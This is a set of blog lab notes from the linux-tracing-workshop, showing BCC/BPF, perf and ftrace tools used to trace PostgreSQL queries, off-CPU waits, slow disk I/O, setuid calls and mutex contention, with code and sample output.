<p>This section uses trace directly on PostgreSQL’s USDT probes.</p>
<p>Start postgres and connect to the database:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu1604:/usr/local/pgsql/bin$ ./psql -d postgres
postgres=# \c foo
You are now connected to database "foo" as user "test".
foo=# select * from tbl
</code></pre></div></div>
<p>After a few attempts, the backend process serving the queries is found to be 54397.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ps aux | grep postgres
test 49781 0.0 0.8 172968 16660 pts/0 S Dec06 0:00 /usr/local/pgsql/bin/postgres -D /tmp/pgdata
test 49784 0.0 0.2 173112 4664 ? Ss Dec06 0:00 postgres: checkpointer
test 49785 0.0 0.2 172968 5000 ? Ss Dec06 0:00 postgres: background writer
test 49786 0.0 0.4 172968 8192 ? Ss Dec06 0:01 postgres: walwriter
test 49787 0.0 0.3 173624 6440 ? Ss Dec06 0:00 postgres: autovacuum launcher
test 49788 0.0 0.1 28052 2280 ? Ss Dec06 0:01 postgres: stats collector
test 49789 0.0 0.1 173396 3824 ? Ss Dec06 0:00 postgres: logical replication launcher
test 54372 0.0 0.2 34240 4100 pts/1 S+ 16:39 0:00 ./psql -d postgres
test 54397 0.0 0.5 173904 11152 ? Ss 16:41 0:00 postgres: test foo [local] idle
root 54400 0.0 0.0 15784 932 pts/4 S+ 16:42 0:00 grep --color=auto postgres
-
^Croot@ubuntu1604:/usr/share/bcc/tools# ./trace -p 54397 'u:/usr/local/pgsql/bin/postgres:query__start "%s", arg1'
PID TID COMM FUNC -
54397 54397 postgres query__start select * from tbl
</code></pre></div></div>
<h3>Showing PostgreSQL Latency Distribution with argdist</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'
</code></pre></div></div>
<p>Copy <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/pg-slow.sql">pg-slow.sql</a> to /tmp, then run it from the psql prompt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> foo=# \i /tmp/pg-slow.sql
</code></pre></div></div>
<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'
[17:18:00]
latency (ms) : count distribution
0 -> 1 : 1 |****************************************|
[17:18:05]
latency (ms) : count distribution
0 -> 1 : 1 |******** |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 5 |****************************************|
256 -> 511 : 0 | |
512 -> 1023 : 0 | |
1024 -> 2047 : 0 | |
2048 -> 4095 : 0 | |
4096 -> 8191 : 1 |******** |
</code></pre></div></div>
<h2 id="14"> 14. Using BPF Tools: CPU and Off-CPU Investigation </h2>
<p>This lab investigates a program that looks CPU-bound on the surface but actually spends most of its time not using the CPU.</p>
<p>Build and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -fno-inline -pthread blocky.c -o blocky
root@ubuntu1604:~/linux-tracing-workshop# ./blocky
[*] Ready to process requests.
[*] Backend handler initialized.
[*] Request processor initialized.
[*] Request processor initialized.
[-] Handled 1000 requests.
[-] Handled 2000 requests.
</code></pre></div></div>
<p>It looks like requests are being handled at a steady rate.</p>
<p>But top shows that blocky’s CPU utilization is quite low, meaning much of the time it is not using the CPU.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./profile -F 997 -f -p $(pidof blocky) > folded-stacks
root@ubuntu1604:/usr/share/bcc/tools# ~/FlameGraph/flamegraph.pl folded-stacks > profile.svg
</code></pre></div></div>
<p>Generate a flame graph. It shows that request_processor and do_work consume most of the CPU, and also that the program frequently ends up waiting on a lock.</p>
<p><img src="/assets/img/tracing3/1.png" alt="" /></p>
<p>Next, use cpudist to see how much time is spent on-CPU versus off-CPU:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist -p $(pidof blocky)
[sudo] password for test:
Tracing on-CPU time... Hit Ctrl-C to end.
^C
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 3 |*************** |
4 -> 7 : 3 |*************** |
8 -> 15 : 2 |********** |
16 -> 31 : 5 |************************* |
32 -> 63 : 3 |*************** |
64 -> 127 : 5 |************************* |
128 -> 255 : 1 |***** |
256 -> 511 : 2 |********** |
512 -> 1023 : 1 |***** |
1024 -> 2047 : 0 | |
2048 -> 4095 : 3 |*************** |
4096 -> 8191 : 8 |****************************************|
8192 -> 16383 : 2 |********** |
</code></pre></div></div>
<p>The distribution above is bimodal, with two compute-heavy clusters, one short and one long. The short one deserves attention: it suggests the program keeps getting switched in and out. Now look at the off-CPU numbers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist -O -p $(pidof blocky)
Tracing off-CPU time... Hit Ctrl-C to end.
^C
usecs : count distribution
0 -> 1 : 2 | |
2 -> 3 : 1 | |
4 -> 7 : 4 | |
8 -> 15 : 7 | |
16 -> 31 : 7 | |
32 -> 63 : 3 | |
64 -> 127 : 48 |*** |
128 -> 255 : 93 |****** |
256 -> 511 : 28 |* |
512 -> 1023 : 11 | |
1024 -> 2047 : 10 | |
2048 -> 4095 : 6 | |
4096 -> 8191 : 6 | |
8192 -> 16383 : 580 |****************************************|
16384 -> 32767 : 556 |************************************** |
</code></pre></div></div>
<p>This is also bimodal, representing the time the program spends waiting. But where do these sleeps come from? offcputime can answer that:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./offcputime -f -p $(pidof blocky) > ~/folded-stacks
[sudo] password for test:
^Ctest@ubuntu:/usr/share/bcc/tools$ ls ~
...
test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > offcpu.svg
bash: offcpu.svg: Permission denied
test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > ~/offcpu.svg
test@ubuntu:/usr/share/bcc/tools$
</code></pre></div></div>
<p>The flame graph indeed shows two waiting paths: one in backend_handler calling nanosleep, and one in request_processor calling __lll_lock_wait:</p>
<p><img src="/assets/img/tracing3/2.png" alt="" /></p>
<h2 id="15"> 15. Using perf Tools: Slow File I/O </h2>
<p>This lab is like the previous one, except this time we use perf and a flame graph to show the file-writing paths.</p>
<p>Build and run logger:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger
root@ubuntu1604:~/linux-tracing-workshop# ./logger
</code></pre></div></div>
<p>iolatency shows that most I/O completes quickly, but there is some slower I/O as well:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools# ./iolatency
Tracing block I/O. Output every 1 seconds. Ctrl-C to end.
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 92 |############################### |
1 -> 2 : 114 |######################################|
2 -> 4 : 3 |# |
4 -> 8 : 3 |# |
8 -> 16 : 8 |### |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 103 |################################## |
1 -> 2 : 117 |######################################|
2 -> 4 : 4 |## |
4 -> 8 : 1 |# |
8 -> 16 : 4 |## |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 96 |################################## |
1 -> 2 : 108 |######################################|
2 -> 4 : 6 |### |
4 -> 8 : 1 |# |
8 -> 16 : 4 |## |
16 -> 32 : 4 |## |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 87 |################################ |
1 -> 2 : 106 |######################################|
2 -> 4 : 3 |## |
4 -> 8 : 4 |## |
8 -> 16 : 6 |### |
16 -> 32 : 2 |# |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 102 |######################################|
1 -> 2 : 103 |######################################|
2 -> 4 : 7 |### |
4 -> 8 : 1 |# |
8 -> 16 : 5 |## |
</code></pre></div></div>
<p>bitesize shows that most of the I/O is small, but some is large:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# ./bitesize
Tracing block I/O size (bytes), until Ctrl-C...
^C
Kbytes : I/O Distribution
-> 0.9 : 2722 |######################################|
1.0 -> 7.9 : 2601 |##################################### |
8.0 -> 63.9 : 1342 |################### |
64.0 -> 127.9 : 0 | |
128.0 -> : 145 |### |
</code></pre></div></div>
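<p>Both iolatency and bitesize present their data as power-of-two histograms, the same bucketing that BPF-based tools get from the bpf_log2l helper. A minimal Python sketch of the slotting (log2_slot and histogram are illustrative helpers, not part of perf-tools):</p>

```python
def log2_slot(value):
    """Bucket index such that slot s covers [2**s, 2**(s+1)), like bpf_log2l."""
    slot = 0
    while value >= (1 << (slot + 1)):
        slot += 1
    return slot

def histogram(values):
    """Count how many values fall into each power-of-two bucket."""
    counts = {}
    for v in values:
        s = log2_slot(v)
        counts[s] = counts.get(s, 0) + 1
    return counts

# Latencies in ms: most finish within 0-1 ms, one lands in the 8-16 ms bucket.
hist = histogram([0, 0, 1, 1, 1, 3, 5, 12])
```

The kernel helper also clamps out-of-range inputs; the sketch ignores that.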
<p>To find where the I/O comes from, we record stack traces at the block:block_rq_insert tracepoint:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# perf record -p $(pidof logger) -e block:block_rq_insert -g -- sleep 10
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.137 MB perf.data (450 samples) ]
</code></pre></div></div>
<p>Generate the flame graph:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > io-stacks.svg
</code></pre></div></div>
<p><img src="/assets/img/tracing3/3.png" alt="" /></p>
<p>The flame graph shows that the I/O comes from two threads: the one on the left accounts for more samples and should be the small I/O, while the one on the right appears less often and corresponds to the large I/O.</p>
linux-tracing-workshop-part 2 (2017-12-07) http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/07/tracing2
<p>Notes on the <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a> labs; this is part 2, covering three labs.</p>
<ul>
<li><a href="#8">8. Writing BPF Tools: setuidsnoop</a></li>
<li><a href="#9">9. Writing BPF Tools: dbslower</a></li>
<li><a href="#10">10. Writing BPF Tools: Contention Stats and Stacks</a></li>
</ul>
<h2 id="8">8. Writing BPF Tools: setuidsnoop</h2>
<p>In this lab we write a BPF tool to trace the setuid system call.
First, we can trace setuid with the generic trace tool:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py 'sys_setuid "uid=0x%x", arg1' 'r::sys_setuid "rc=%d", retval'
PID TID COMM FUNC -
34913 34913 su sys_setuid uid=0x3e8
34913 34913 su sys_setuid rc=0
34932 34932 cron sys_setuid uid=0x0
34932 34932 cron sys_setuid rc=0
</code></pre></div></div>
<p>We can also write a standalone BPF tool; this lab adapts killsnoop.py to trace setuid instead.</p>
<p>Step 1: replace sys_kill with sys_setuid</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kprobe__sys_kill->kprobe__sys_setuid
kretprobe__sys_kill->kretprobe__sys_setuid
</code></pre></div></div>
<p>Step 2: change the function signature</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kprobe__sys_setuid(struct pt_regs *ctx, int tpid, int sig)-->
int kprobe__sys_setuid(struct pt_regs *ctx, u32 uid)
</code></pre></div></div>
<p>Step 3: change the data structures, replacing kill's arguments with setuid's</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct val_t {
u64 pid;
u32 uid;
char comm[TASK_COMM_LEN];
};
struct data_t {
u64 pid;
u32 uid;
int ret;
char comm[TASK_COMM_LEN];
};
class Data(ct.Structure):
_fields_ = [
("pid", ct.c_ulonglong),
("uid", ct.c_uint),
("ret", ct.c_int),
("comm", ct.c_char * TASK_COMM_LEN)
]
</code></pre></div></div>
<p>Step 4: update the data in the kprobe and kretprobe handlers</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    int kprobe__sys_setuid(struct pt_regs *ctx, u32 uid)
{
u32 pid = bpf_get_current_pid_tgid();
FILTER
struct val_t val = {.pid = pid};
if (bpf_get_current_comm(&val.comm, sizeof(val.comm)) == 0) {
val.uid = uid;
infotmp.update(&pid, &val);
}
return 0;
};
int kretprobe__sys_setuid(struct pt_regs *ctx)
{
struct data_t data = {};
struct val_t *valp;
u32 pid = bpf_get_current_pid_tgid();
valp = infotmp.lookup(&pid);
if (valp == 0) {
// missed entry
return 0;
}
bpf_probe_read(&data.comm, sizeof(data.comm), valp->comm);
data.pid = pid;
data.uid = valp->uid;
data.ret = PT_REGS_RC(ctx);
events.perf_submit(ctx, &data, sizeof(data));
infotmp.delete(&pid);
return 0;
}
</code></pre></div></div>
<p>Step 5: update the printed output</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> print("%-9s %-6s %-16s %-6s %s" % (
"TIME", "PID", "COMM", "UID", "RESULT"))
# process event
def print_event(cpu, data, size):
event = ct.cast(data, ct.POINTER(Data)).contents
if (args.failed and (event.ret >= 0)):
return
print("%-9s %-6d %-16s %-6d %d" % (strftime("%H:%M:%S"),
event.pid, event.comm.decode(), event.uid, event.ret))
</code></pre></div></div>
<p>Result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./setuidsnoop.py
TIME PID COMM UID RESULT
11:41:05 36919 su 1000 0
11:45:01 36941 cron 0 0
</code></pre></div></div>
<p>The <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/setuidsnoop.py">full version</a> from the original lab.</p>
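<p>On the Python side, print_event receives a raw buffer from the perf ring and casts it to the Data structure with ctypes. That decoding can be exercised without any BPF at all; the field values below are made up for illustration:</p>

```python
import ctypes as ct

TASK_COMM_LEN = 16  # mirrors the kernel constant used in the BPF program

class Data(ct.Structure):
    _fields_ = [
        ("pid", ct.c_ulonglong),
        ("uid", ct.c_uint),
        ("ret", ct.c_int),
        ("comm", ct.c_char * TASK_COMM_LEN),
    ]

# Simulate the raw bytes the perf buffer would hand to print_event.
raw = bytes(Data(pid=36919, uid=1000, ret=0, comm=b"su"))
buf = ct.create_string_buffer(raw, len(raw))
event = ct.cast(buf, ct.POINTER(Data)).contents

# Same formatting print_event uses, minus the timestamp column.
line = "%-6d %-16s %-6d %d" % (event.pid, event.comm.decode(), event.uid, event.ret)
```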
<h2 id="9">9. Writing BPF Tools: dbslower </h2>
<p>This lab develops a BCC tool based on USDT probes to monitor database query latency and execution.</p>
<p>First download PostgreSQL and build it with --enable-dtrace so that it supports USDT, then start it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ cd /usr/local/pgsql/bin
$ ./initdb -D /tmp/pgdata
$ ./pg_ctl -D /tmp/pgdata start
</code></pre></div></div>
<p>List the USDT probes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu1604:/usr/local/pgsql/bin$ /usr/share/bcc/tools/tplist -p $(pgrep -n postgres) | grep query
/usr/local/pgsql/bin/postgres postgresql:query__parse__start
/usr/local/pgsql/bin/postgres postgresql:query__parse__done
/usr/local/pgsql/bin/postgres postgresql:query__rewrite__start
/usr/local/pgsql/bin/postgres postgresql:query__rewrite__done
/usr/local/pgsql/bin/postgres postgresql:query__plan__start
/usr/local/pgsql/bin/postgres postgresql:query__plan__done
/usr/local/pgsql/bin/postgres postgresql:query__start
/usr/local/pgsql/bin/postgres postgresql:query__done
/usr/local/pgsql/bin/postgres postgresql:query__execute__start
/usr/local/pgsql/bin/postgres postgresql:query__execute__done
</code></pre></div></div>
<p>This lab focuses on query__start and query__done; the first argument of query__start is the query text.</p>
<p>Below we fill in the skeleton the lab provides.</p>
<p>Step 1: find the PostgreSQL process ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dbpid = int(subprocess.check_output("pgrep -n postgres".split()))
</code></pre></div></div>
<p>Step 2: define the data structures holding the PID, timestamp, duration, and query text</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct temp_t {
u64 timestamp;
char *query;
};
struct data_t {
u64 pid;
u64 timestamp;
u64 duration;
char query[256];
};
BPF_HASH(temp, u64, struct temp_t);
BPF_PERF_OUTPUT(events);
</code></pre></div></div>
<p>Step 3: write the two functions handling query__start and query__done</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int probe_query_start(struct pt_regs *ctx) {
struct temp_t tmp = {};
tmp.timestamp = bpf_ktime_get_ns();
bpf_usdt_readarg(1, ctx, &tmp.query);
u64 pid = bpf_get_current_pid_tgid();
temp.update(&pid, &tmp);
return 0;
}
int probe_query_end(struct pt_regs *ctx) {
struct temp_t *tempp;
u64 pid = bpf_get_current_pid_tgid();
tempp = temp.lookup(&pid);
if (!tempp)
return 0;
u64 delta = bpf_ktime_get_ns() - tempp->timestamp;
if (delta >=""" + str(threshold_ns) + """) {
struct data_t data = {};
data.pid = pid >> 32;
data.timestamp = tempp->timestamp;
data.duration = delta;
bpf_probe_read(&data.query, sizeof(data.query), tempp->query);
events.perf_submit(ctx, &data, sizeof(data));
}
temp.delete(&pid);
return 0;
};
</code></pre></div></div>
<p>Step 4: use enable_probe to wire up query__start and query__done</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> usdt = USDT(pid=int(dbpid))
usdt.enable_probe("query__start", "probe_query_start")
usdt.enable_probe("query__done", "probe_query_end")
</code></pre></div></div>
<p>Step 5: define the Python structure representing the output</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> class Data(ct.Structure):
_fields_ = [
("pid", ct.c_ulonglong),
("timestamp", ct.c_ulonglong),
("delta", ct.c_ulonglong),
("query", ct.c_char * 256)
]
</code></pre></div></div>
<p>Step 6: print the output</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> start = 0
def print_event(cpu, data, size):
global start
event = ct.cast(data, ct.POINTER(Data)).contents
if start == 0:
start = event.timestamp
print("%-14.6f %-6d %8.3f %s" % (float(event.timestamp - start) / 1000000000,
event.pid, float(event.delta) / 1000000, event.query))
print("Tracing database queries for PID %d slower than %d ms..." %
(dbpid, args.threshold))
print("%-14s %-6s %8s %s" % ("TIME(s)", "PID", "MS", "QUERY"))
bpf["events"].open_perf_buffer(print_event)
</code></pre></div></div>
<p>Result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./lqdbslower.py postgres 0
/virtual/main.c:45:15: warning: comparison of unsigned expression >= 0 is always true [-Wtautological-compare]
if (delta >=0) {
~~~~~ ^ ~
1 warning generated.
Tracing database queries for PID 50216 slower than 0 ms...
TIME(s) PID MS QUERY
0.000000 50216 1.806 INSERT INTO tbl(name, date) VALUES('aaa', '2013-12-22');
7.150496 50216 0.227 select * from tbl
</code></pre></div></div>
<p>The original lab's <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/dbslower.py">dbslower.py</a>.</p>
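<p>A detail worth noting is the unit juggling: bpf_ktime_get_ns yields nanoseconds, the threshold argument is in milliseconds, and the output prints the duration in milliseconds. The filtering and conversion can be sketched in plain Python (slow_queries is an illustrative name, not from dbslower.py):</p>

```python
NS_PER_MS = 1_000_000

def slow_queries(events, threshold_ms):
    """events: (start_ns, end_ns, query) tuples, one per completed query.
    Return (duration_ms, query) pairs for queries slower than the threshold,
    mirroring the delta check in probe_query_end."""
    threshold_ns = threshold_ms * NS_PER_MS
    out = []
    for start_ns, end_ns, query in events:
        delta = end_ns - start_ns
        if delta >= threshold_ns:
            out.append((delta / NS_PER_MS, query))
    return out

rows = slow_queries(
    [(0, 1_806_000, "INSERT INTO tbl ..."),          # took 1.806 ms
     (5_000_000, 5_227_000, "select * from tbl")],   # took 0.227 ms
    threshold_ms=1)
```

With threshold_ms=0 every query passes the filter, which is why the sample run above compiles with a tautological-compare warning.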
<h2 id="10"> 10. Writing BPF Tools: Contention Stats and Stacks </h2>
<p>This lab writes a BCC-based tool for observing contention on Linux mutexes.</p>
<p>First compile and run the program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -pthread parprimes.c -o parprimes
root@ubuntu1604:~/linux-tracing-workshop# ./parprimes 4 10000
</code></pre></div></div>
<p>Find the TODOs in <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/lockstat.py">lockstat.py</a> and complete the tool.</p>
<p>// TODO Update tm_key fields with the mutex, tid, and stack id</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> tm_key.tid = pid;
tm_key.mtx = entry->mtx;
tm_key.lock_stack_id = stack_id;
</code></pre></div></div>
<p>// TODO Call locks.lookup_or_init(…) and update the wait time and the enter count
// of the entry in the locks data structure</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct thread_mutex_val_t *existing_tm_val, new_tm_val = {};
existing_tm_val = locks.lookup_or_init(&tm_key, &new_tm_val);
existing_tm_val->wait_time_ns += wait_time;
if (PT_REGS_RC(ctx) == 0) {
existing_tm_val->enter_count += 1;
}
</code></pre></div></div>
<p>// TODO Update the mutex_lock_hist histogram with the time we held the lock</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u64 slot = bpf_log2l(hold_time / 1000);
mutex_lock_hist.increment(slot);
</code></pre></div></div>
<p>// TODO Similarly to the previous probe, attach the following probes:
// uprobe in pthread_mutex_lock handled by probe_mutex_lock
// uretprobe in pthread_mutex_lock handled by probe_mutex_lock_return
// uprobe in pthread_mutex_unlock handled by probe_mutex_unlock</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bpf.attach_uprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock", pid=pid)
bpf.attach_uretprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock_return", pid=pid)
bpf.attach_uprobe(name="pthread", sym="pthread_mutex_unlock", fn_name="probe_mutex_unlock", pid=pid)
</code></pre></div></div>
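<p>The three probes above implement a classic timing pattern: stamp at pthread_mutex_lock entry, compute the wait time when it returns, and compute the hold time at pthread_mutex_unlock. In plain Python terms (lock_times is an illustrative helper covering a single thread and mutex):</p>

```python
def lock_times(events):
    """events: (ts_ns, kind) with kind in {'lock', 'acquired', 'unlock'}.
    Return (wait_ns, hold_ns) pairs, mirroring how probe_mutex_lock,
    probe_mutex_lock_return, and probe_mutex_unlock split the work."""
    pairs = []
    lock_ts = acq_ts = None
    for ts, kind in events:
        if kind == "lock":          # uprobe: pthread_mutex_lock entry
            lock_ts = ts
        elif kind == "acquired":    # uretprobe: the lock call returned
            acq_ts = ts
        elif kind == "unlock":      # uprobe: pthread_mutex_unlock entry
            pairs.append((acq_ts - lock_ts, ts - acq_ts))
    return pairs

pairs = lock_times([(0, "lock"), (700, "acquired"), (1500, "unlock")])
```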
<p>// TODO Print a nicely formatted line with the mutex description, wait time,
// hold time, enter count, and stack (use print_stack)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> print("\tmutex %s ::: wait time %.2fus ::: hold time %.2fus ::: enter count %d" %
(mutex_descr, v.wait_time_ns/1000.0, v.lock_time_ns/1000.0, v.enter_count))
print_stack(bpf, pid, stacks, k.lock_stack_id)
</code></pre></div></div>
<p>Result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# python lockstat.py $(pidof parprimes)
init stack for mutex 7fff3dfa1fa0 (#1)
[unknown] (7f2eebaa85a0)
[unknown] (7f2eeb6f5830)
[unknown] (113e258d4c544155)
thread 53243
mutex [unknown] ::: wait time 7.01us ::: hold time 5.56us ::: enter count 1
[unknown] (7f2eebcccb34)
[unknown] (7f2eeb70eff8)
[unknown] (7f2eeba9b060)
thread 53246
mutex #1 ::: wait time 1655.31us ::: hold time 809.63us ::: enter count 369
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53247
mutex #1 ::: wait time 12850.63us ::: hold time 660.04us ::: enter count 302
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53248
mutex #1 ::: wait time 13290.15us ::: hold time 610.43us ::: enter count 281
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53249
mutex #1 ::: wait time 1282.58us ::: hold time 621.87us ::: enter count 279
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
wait time (us) : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 1229 |****************************************|
8 -> 15 : 1 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 0 | |
1024 -> 2047 : 0 | |
2048 -> 4095 : 0 | |
4096 -> 8191 : 0 | |
8192 -> 16383 : 2 | |
hold time (us) : count distribution
0 -> 1 : 0 | |
2 -> 3 : 1227 |****************************************|
4 -> 7 : 4 | |
8 -> 15 : 1 | |
</code></pre></div></div>
<p>The original lab's solution: <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/lockstat-solution.py">lockstat-solution</a>.</p>
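<p>The kernel side of lockstat boils down to a hash-map aggregation keyed by thread and mutex (plus the stack id): lookup_or_init the entry, add the wait time, and bump the enter count when the lock call succeeded. The same aggregation in plain Python (a sketch of the idea, not the BPF code; the stack-id key is omitted):</p>

```python
def aggregate(samples):
    """samples: (tid, mutex, wait_ns, acquired) tuples, one per
    pthread_mutex_lock return. Mirrors the locks.lookup_or_init updates."""
    locks = {}
    for tid, mtx, wait_ns, acquired in samples:
        entry = locks.setdefault((tid, mtx), {"wait_time_ns": 0, "enter_count": 0})
        entry["wait_time_ns"] += wait_ns
        if acquired:  # PT_REGS_RC(ctx) == 0 means the lock was taken
            entry["enter_count"] += 1
    return locks

stats = aggregate([
    (53246, 0x7fff3dfa1fa0, 4000, True),
    (53246, 0x7fff3dfa1fa0, 7000, True),
    (53247, 0x7fff3dfa1fa0, 9000, False),
])
```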
linux-tracing-workshop-part 1 (2017-12-05) http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/05/tracing1
<p>Notes on the <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a> labs; this is part 1, covering seven labs.</p>
<ul>
<li><a href="#1">1. Probing Tracepoints with ftrace</a></li>
<li><a href="#2">2. CPU Sampling with perf and Flame Graphs</a></li>
<li><a href="#3">3. Using BPF Tools: Broken File Opens</a></li>
<li><a href="#4">4. Using BPF Tools: Slow File I/O</a></li>
<li><a href="#5">5. Using BPF Tools: Chasing a Memory Leak</a></li>
<li><a href="#6">6. Using BPF Tools: Database and Disk Stats and Stacks</a></li>
<li><a href="#7">7. Using BPF Tools: Node and JVM USDT Probes</a></li>
</ul>
<h2 id="1">1. Probing Tracepoints with ftrace</h2>
<h3>Enable the sched:sched_switch tracepoint to trace thread switches</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# cd /sys/kernel/debug/tracing/
root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > tracing_on
root@ubuntu1604:/sys/kernel/debug/tracing# cat events/sched/sched_switch/format
name: sched_switch
ID: 273
format:
field:unsigned short common_type; offset:0; size:2; signed:0;
field:unsigned char common_flags; offset:2; size:1; signed:0;
field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
field:int common_pid; offset:4; size:4; signed:1;
field:char prev_comm[16]; offset:8; size:16; signed:1;
field:pid_t prev_pid; offset:24; size:4; signed:1;
field:int prev_prio; offset:28; size:4; signed:1;
field:long prev_state; offset:32; size:8; signed:1;
field:char next_comm[16]; offset:40; size:16; signed:1;
field:pid_t next_pid; offset:56; size:4; signed:1;
field:int next_prio; offset:60; size:4; signed:1;
